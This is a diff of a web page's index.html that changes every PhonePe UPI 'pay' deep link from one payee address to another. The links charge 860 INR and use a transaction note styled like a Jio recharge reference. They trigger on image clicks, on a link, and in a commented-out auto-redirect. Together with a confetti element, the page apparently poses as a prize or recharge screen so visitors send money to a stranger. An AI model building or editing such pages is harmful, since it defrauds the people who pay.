--- a/index.html
+++ b/index.html
@@ -61,7 +61,7 @@ location.href='phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ
 
 <div>
 <div>
-<img src="1 (2).jpg" width="100%" height="auto" onclick="location.href='phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr '">
+<img src="1 (2).jpg" width="100%" height="auto" onclick="location.href='phonepe://pay?pa=getbackup@kotak&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr '">
 </div>
 <div class="container" id="js-container">
 <div class="confetti"></div>
@@ -103,7 +103,7 @@ location.href='phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ
 	
 		<div>
 			
-			 <a href="phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr">
+			 <a href="phonepe://pay?pa=getbackup@kotak&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr">
 				 
 				 <img src="3 (2).jpg" width="100%" height="auto">
 				 
@@ -111,14 +111,14 @@ location.href='phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ
 			
 		<!--	
 			
-             <img src="3 (2).jpg" width="100%" height="auto" onclick="location.href="phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr">
+             <img src="3 (2).jpg" width="100%" height="auto" onclick="location.href="phonepe://pay?pa=getbackup@kotak&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr">
         </div>
 
 	
 	
 	
 	
-	<meta http-equiv="refresh" content="6;url="phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr">
+	<meta http-equiv="refresh" content="6;url="phonepe://pay?pa=getbackup@kotak&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr">
 	
 	--->
 	
